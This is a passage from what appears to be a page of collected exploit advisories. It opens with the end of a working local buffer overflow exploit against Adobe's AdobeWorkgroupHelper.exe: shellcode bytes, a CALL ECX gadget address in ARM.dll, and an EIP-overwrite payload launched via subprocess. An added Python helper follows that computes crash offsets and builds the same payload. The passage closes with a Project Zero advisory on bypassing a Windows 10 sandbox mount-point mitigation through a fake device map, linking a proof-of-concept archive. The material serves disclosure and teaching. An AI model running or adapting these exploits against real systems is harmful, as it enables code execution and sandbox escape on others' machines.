"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\Program Files (x86)\Common Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "

#payload="A"*5852+"R"*4   #<---- control EIP register
#our shellcode will be pointed at by the ECX register, so we need to find a JMP or CALL ECX
#and point EIP to that address; our malicious code resides there, and we find the gadget in ARM.dll
eip=struct.pack('<L', 0x618B19F7)   #CALL ECX ARM.dll v2.8.3.3
payload="A"*5852+eip+"\x90"*20+sc   #<----- direct EIP overwrite BOOOOOM!!!

subprocess.Popen([vulnpgm, payload], shell=False)

'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
October 12, 2015 : Public Disclosure

Exploitation Technique:
=======================
Local

Severity Level:
=========================================================
Med

===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
'''
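How an offset like "about 5,856 bytes" is found, and what the final buffer looks like, as an added Python 3 example that is not part of hyp3rlinx's script: a Metasploit-style cyclic pattern maps the EIP value seen in the debugger back to exactly one offset, and the payload builder refuses NUL bytes because this buffer travels as a command-line argument, i.e. a C string. The 5852-byte offset, the CALL ECX address 0x618B19F7 in ARM.dll and the 20-byte sled are taken from the exploit; the function names and the int3 stand-in shellcode are assumptions.

```python
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style 'Aa0Aa1Aa2...' pattern. Every 4-byte window is unique
    within the first 20280 bytes, so a crash EIP maps back to one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is only unique up to 20280 bytes")


def pattern_offset(pattern: bytes, eip: int) -> int:
    """eip as the debugger prints it (e.g. 0x41414141). The bytes in memory are
    little-endian, so pack before searching. Returns -1 if EIP was not ours."""
    return pattern.find(struct.pack("<I", eip))


def has_bad_chars(data: bytes, bad: bytes = b"\x00") -> bool:
    return any(b in data for b in bad)


def build_eip_payload(offset: int, ret_addr: int, shellcode: bytes, nop_len: int = 20) -> bytes:
    """[padding][EIP -> CALL ECX gadget][NOP sled][shellcode], the layout of the
    exploit above. At the crash ECX points at our data, so the gadget lands on the sled."""
    ret = struct.pack("<I", ret_addr)
    if has_bad_chars(ret):
        raise ValueError("gadget address contains NUL; argv delivery would truncate there")
    payload = b"A" * offset + ret + b"\x90" * nop_len + shellcode
    if has_bad_chars(payload):
        raise ValueError("payload contains NUL; use a different gadget or encoder")
    return payload


if __name__ == "__main__":
    # Step 1: crash the target with a pattern and read EIP in the debugger.
    # Constructed here by slicing the pattern at the known offset instead of running it.
    pat = cyclic_pattern(6000)
    eip_seen = int.from_bytes(pat[5852:5856], "little")
    print("EIP 0x%08x -> offset %d" % (eip_seen, pattern_offset(pat, eip_seen)))
    # Step 2: build the real buffer around the CALL ECX gadget from ARM.dll.
    payload = build_eip_payload(5852, 0x618B19F7, b"\xcc" * 8)
    print(len(payload), "bytes, EIP bytes:", payload[5852:5856].hex())
```

The NUL check is the caveat that distinguishes this bug from the file-format overflows elsewhere on this page: an address such as 0x004043a4 is fine inside a .aiff read from disk, but as an argv string it would end the buffer at the first 0x00 and the sled would never be copied.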
25. Source: https://code.google.com/p/google-security-research/issues/detail?id=486

Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass
Platform: Windows 10 (build 10240), earlier versions do not have the functionality
Class: Security Feature Bypass

Summary: A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed.

Description:
Windows 10 has added some new mitigations to block the creation, or change the behaviour, of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim is to make it harder to abuse these types of tricks to break out of a sandbox. In earlier builds of Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed to be a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly:

if (RtlIsSandboxedProcess()) {
  if (ControlCode == FSCTL_SET_MOUNT_POINT) {
    if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) {
      NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ..., FILE_DIRECTORY_FILE);
      if (!NT_SUCCESS(status)) {
        return status;
      }
    }
  }
}

The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately there's a perhaps unexpected problem with this check: the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call, which means it honours the user's device mapping.
While the sandboxed process cannot change the per-user drive mappings, it can change the process's device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which, while they also have a mitigation, only prevents a higher privilege process following them, which we don't care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to, say, \??\c:\somewhere we can build something like:

<UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\)

If we set the unnamed directory as the process device map we can bypass the check and create the mount point. Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value.

Proof of Concept:
I've provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or by modifying the executable file's ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shell's mklink tool, which will fail to create the mount point at low integrity. The archive password is 'password'. Follow these steps:

1) Extract the PoC to a location on a local hard disk which is writable by a normal user.
2) Execute the poc executable file as low integrity, passing two arguments: the path to a directory to create (must be somewhere that can be written to as the low integrity user, such as AppData\Temp\Low) and the arbitrary file path to set the mount point to.
For example: poc.exe c:\users\user\appdata\local\low\abc c:\notreal. Expected Result: It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user Observed Result: The mount point is created successfully. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38474.zip